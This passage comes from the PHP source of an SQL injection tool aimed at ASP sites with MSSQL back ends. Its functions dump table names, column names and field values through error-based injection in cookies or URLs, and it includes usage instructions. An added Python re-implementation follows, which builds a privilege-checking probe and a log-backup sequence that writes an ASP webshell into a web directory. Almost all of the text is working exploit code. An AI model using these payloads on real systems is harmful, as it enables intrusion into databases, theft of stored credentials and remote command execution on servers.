        if($bstr) $new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
        else $new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
        $re=find_value($new_cookie);
        // TOP N past the last table keeps returning the same name, which ends the loop
        if($re!=$old_re) {
            output_td($re);
            if(($num % 8)==0) {
                output_td('/tr');
                output_td('tr');
            }
        }
        else break;
        $old_re=$re;
        $num++;
    }while($re);
    output_td('/tr');
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// initialise the curl session; referer and base URL only matter for cookie injection
function init_session(){
    global $proxy,$useproxy,$curl,$referer,$url,$_htype;
    $curl=curl_init();
    curl_setopt($curl,CURLOPT_HEADER,1);
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    if($_htype=='cookie'){
        curl_setopt($curl,CURLOPT_REFERER,$referer);
        curl_setopt($curl,CURLOPT_URL,$url);
    }
    if(isset($useproxy) && !empty($proxy)) curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// generic value fetch: send the carrier and pull the |...| fenced value out of the error page
function find_value($cookie,$debug=0){
    global $curl,$_htype;
    if($debug) dbgput($cookie);
    if($_htype=='cookie') curl_setopt($curl,CURLOPT_COOKIE,$cookie);
    else curl_setopt($curl,CURLOPT_URL,$cookie);
    $content=curl_exec($curl);
    if($debug) dbgput($content);
    $re=preg_match("/(\|.*\|)/si",$content,$result);
    if($debug) dbgput($result[1]);
    if($re) {
        return str_replace('|','',$result[1]);
    }
    return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
// string -> 0x hex literal of its raw bytes (for image/varbinary columns); %02x keeps
// bytes below 0x10 two digits wide, which dechex() on its own does not
function str2hex($str){
    $temp="0x";
    for($i=0;$i<strlen($str);$i++) $temp.=sprintf('%02x',ord($str[$i]));
    return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
// string -> MSSQL nvarchar hex literal (UTF-16LE: every byte followed by 00)
function str2sqlhex($str){
    $temp="0x";
    for($i=0;$i<strlen($str);$i++){
        $temp.=sprintf('%02x',ord($str[$i]))."00";
    }
    return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump table names
function exploit_tab(){
    global $bstr,$cookie,$tab_exp,$count_table,$curl;
    $table=Null;
    $temp=Null;
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
    else $new_cookie=str_replace('MIKA',$count_table,$cookie);
    output_start();
    if($re=find_value($new_cookie)){
        echo "<b>Number of tables:</b><font color=blue>$re</font>\n";
    }
    /* old NOT IN(...) enumeration, superseded by explode_tab():
    do{
        if($table==Null){
            $new_url=str_replace('MFM_TABLES',"''",$tab_exp);
        }
        else{
            $new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
        }
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else $new_cookie=str_replace('MIKA',$new_url,$cookie);
        $re=find_value($new_cookie);
        if($re) {
            $table=$re;
            if($temp==Null){
                $temp=str2sqlhex($table);
            }else{
                $temp.=",".str2sqlhex($table);
            }
            fputs($table_file,"|------------ ".$table."\n");
            echo "|------------ ".$table."\n";
        }
    }while($re);*/
    explode_tab();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump column names of a table
function exploit_field(){
    global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
    $old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
    $count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
    $num=1;
    $i=0;
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
    else $new_cookie=str_replace('MIKA',$count_column,$cookie);
    output_start();
    if($total=$re=find_value($new_cookie)){
        echo "<b>Number of columns in $table_name:</b><font color=blue>$re</font>\n";
    }
    output_th('tr');
    for($i=0;$i<4;$i++) output_th('Fields');
    output_th('/tr');
    output_td('tr');
    do{
        // col_name(object_id(table), N) walks the columns by ordinal position
        $temp=$old_url;
        $new_url=str_replace('MFM_NUM',"$num",$temp);
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else $new_cookie=str_replace('MIKA',$new_url,$cookie);
        $re=find_value($new_cookie);
        if($re){
            output_td($re);
            if(($num % 4)==0) {
                output_td('/tr');
                output_td('tr');
            }
        }
        $num++;
    }while($num<=$total);
    output_td('/tr');
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// old-style value dump (NOT IN based, writes to a file); kept for reference, explode_value() is used instead
function exploit_value(){
    global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
    $value=Null;
    $temp=Null;
    $count=0;
    $count_num=1;
    $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie);
    else $new_cookie=str_replace('MIKA',$old,$cookie);
    $re=find_value($new_cookie);
    $record_file=fopen("records-$field_name.txt","w");
    if($re) {
        $count=$re;
        echo "the number of record in $table_name is: $count\n";
        fputs($record_file,"the number of record in $table_name is: $count\n");
    }
    $old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
    $old=str_replace('MFM_TABLE_NAME',$table_name,$old);
    do{
        if($value==Null){
            $new_url=str_replace('MFM_VALUE',"''",$old);
        }
        else{
            $new_url=str_replace('MFM_VALUE',$temp,$old);
        }
        if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
        else $new_cookie=str_replace('MIKA',$new_url,$cookie);
        $re=find_value($new_cookie);
        if($re) {
            $value=$re;
            echo "|------------ ".$value."\n";
            fputs($record_file,"|------------ ".$value."\n");
            // values already seen go into the NOT IN(...) list as hex literals
            if($temp==Null){
                $temp=str2sqlhex($value);
            }else{
                $temp.=",".str2sqlhex($value);
            }
        }else{
            echo "|------------ None\n";
            fputs($record_file,"|------------ None\n");
        }
        $count_num++;
    }while($count_num<=$count);
    fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?>
<?php if(!array_key_exists('_submit',$_POST)){ ?>
<center><h2><font color=blue>ASP MSSQL Injection Helper Tool by mika[EST]</font></h2></center><br>
<div align=center>
<font color=red>Works only against MSSQL back ends, and the target must have detailed error messages enabled.</font><br>
<font color=blue>Usage is straightforward:</font><br>
<font color=blue>For <font color=red>cookie</font> injection, first paste the real <font color=red>cookie</font> you obtained into the "exploitable cookie" field and append the keyword <font color=red>MIKA</font> directly <font color=red>after</font> the injectable field, with no spaces, as in the example below. Take this <font color=red>cookie:</font></font><br>
<font color=red>"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"</font><br>
<font color=blue>Here the myset field is not filtered properly and is injectable, so the keyword MIKA goes right after template, and the "exploitable cookie" field should hold the modified cookie:</font><br>
<font color=red>$cookie="my web=myset=template<font color=red>MIKA</font>; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";</font><br>
<font color=blue>"Exploitable Url" is the address of the vulnerable page. "referer url" is the value of the Referer header; normally the same value as "Exploitable Url" is fine.</font><br>
For <font color=red>url</font> injection no cookie or referer is needed; just append the keyword <font color=red>MIKA</font> after the injectable parameter in the <font color=red>url</font>, for example: http://www.mika520.net/vul.php?id=1<font color=red>MIKA</font><br>
<font color=blue>"Num Type" and "Char Type" select the injection type, numeric or character respectively; pick whichever matches the target.<br>
"Explode Tables Of Current DataBase" dumps all table names of the current database.<br>
"Explode Fields Of" dumps the column names of a table; enter the table name in the box that follows.<br>
"Explode Values Of" dumps field values of a table. In the two boxes that follow, enter the field name(s) and the table name, left to right. Several fields may be given at once, separated by commas (","), for example:<br>
<font color=red>username,password,userid</font><br>
"Via Anonymous Proxy" selects whether to go through an anonymous HTTP proxy; the address format is "127.0.0.1:8080".<br>
</font>
<font color=red>by mika[EST]</font><br>
</div>
<?php } ?>
</body>
</html>
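The pieces the tool chains together (hex-encoding strings so no quote appears in the payload, splicing the payload into the cookie or URL at the MIKA marker described in the usage text, the getinfo() probe, the log-backup statement sequence, and fishing the |...| fenced value out of the ODBC error page) are small enough to show end to end. The Python below is an added example, not the tool's own code or anything by Mika[EST]; the function names and the sample cookie and error page are constructed for illustration, while the hex literals it produces are checked against the ones that appear in the tool's source.

```python
# Added example (not the tool's code): the encoding, carrier-building and
# error-page extraction steps of the PHP tool, re-implemented in Python.
# Function names and the sample cookie/error page are constructed for
# illustration; the hex literals are checked against those in the tool above.
import re
from urllib.parse import quote

MARKER = "MIKA"  # the injection-point marker the tool's usage text asks for

# Same column order as the tool's $infohead array in getinfo()
INFO_FIELDS = ["Server Version", "LoginName", "Username", "Database", "IsDb_Owner",
               "IsSysadmin", "IsServerAdmin", "IsBulkAdmin", "IsSetupAdmin", "IsDiskAdmin"]


def to_sqlhex(s):
    """Hex literal for an NVARCHAR value: UTF-16LE, so each ASCII byte is followed by 00
    (the tool's str2sqlhex()). Keeps quote characters out of the payload entirely."""
    return "0x" + s.encode("utf-16-le").hex().upper()


def to_hex(s):
    """Hex literal for an IMAGE/VARBINARY value (the tool's str2hex()), always two digits
    per byte; PHP's bare dechex() drops the leading zero for bytes below 0x10."""
    return "0x" + s.encode("utf-8").hex().upper()


def build_carrier(template, payload, char_type=False):
    """Put the URL-encoded payload where MARKER sits in a cookie or URL template.
    For a string injection point a closing quote (%27) goes first, as the tool does."""
    prefix = "%27" if char_type else ""
    return template.replace(MARKER, prefix + quote(payload, safe=""))


def server_info_payload():
    """The tool's getinfo() probe: version, login, user, database and role checks joined
    with char(92) separators, fenced by char(124), and forced into a numeric comparison
    so the ODBC conversion error leaks the whole string."""
    roles = ["sysadmin", "serveradmin", "bulkadmin", "setupadmin", "diskadmin"]
    parts = ["@@VERSION", "system_user", "user", "db_name()",
             "convert(char(1),IS_MEMBER(%s))" % to_sqlhex("db_owner")]
    parts += ["convert(char(1),IS_SRVROLEMEMBER(%s))" % to_sqlhex(r) for r in roles]
    return " and (select char(124)+" + "+char(92)+".join(parts) + "+char(124))>0--"


def log_backup_payloads(tmp_tab, code, abspath):
    """Stacked statements of the log-backup webshell, in the tool's order. ALTER DATABASE
    takes a literal name, so the recovery-model switch is built as dynamic SQL."""
    recover = ";declare @d sysname select @d=db_name() exec('alter database ['+@d+'] set recovery %s')--"
    backup = ";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=%s backup log @a to disk=@s with init--"
    return [
        recover % "full",
        ";drop table [%s];create table [%s]([cmd] [image])--" % (tmp_tab, tmp_tab),
        backup % to_sqlhex("c:\\mika.bak"),   # priming backup, so the next one is small
        ";insert into [%s](cmd) values(%s)--" % (tmp_tab, to_hex(code)),
        backup % to_sqlhex(abspath),           # the webshell lands inside this file
        recover % "simple",
    ]


def extract_value(html):
    """Return the text between the first pair of '|' fences in an error page, else None."""
    m = re.search(r"\|(.*?)\|", html, re.S)
    return m.group(1) if m else None


def parse_server_info(html):
    """Split a leaked getinfo() string on its char(92) separators into named fields."""
    raw = extract_value(html)
    if raw is None:
        return None
    return dict(zip(INFO_FIELDS, raw.split("\\")))


# Constructed sample cookie (the one from the usage text) and a constructed ASP/ODBC
# error page of the kind the tool depends on; neither comes from a real target.
SAMPLE_COOKIE = "my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"
SAMPLE_ERROR_PAGE = (
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar "
    "value '|Microsoft SQL Server  2000 - 8.00.194 (Intel X86)\\sa\\dbo\\shop\\1\\1\\1\\0\\0\\0|' "
    "to a column of data type int.\n"
)

if __name__ == "__main__":
    print(build_carrier(SAMPLE_COOKIE, server_info_payload(), char_type=True))
    for k, v in parse_server_info(SAMPLE_ERROR_PAGE).items():
        print("%-14s %s" % (k, v))
    for stmt in log_backup_payloads("tmp_mika", '<%execute(request("l"))%>', "c:\\web\\x.asp"):
        print(stmt)
```

build_carrier() encodes spaces as %20 where PHP's urlencode() would emit +; both decode to a space in a query string. extract_value() is deliberately non-greedy, unlike the tool's `(\|.*\|)` pattern, which on a page containing more than two pipe characters would swallow everything between the first and the last one.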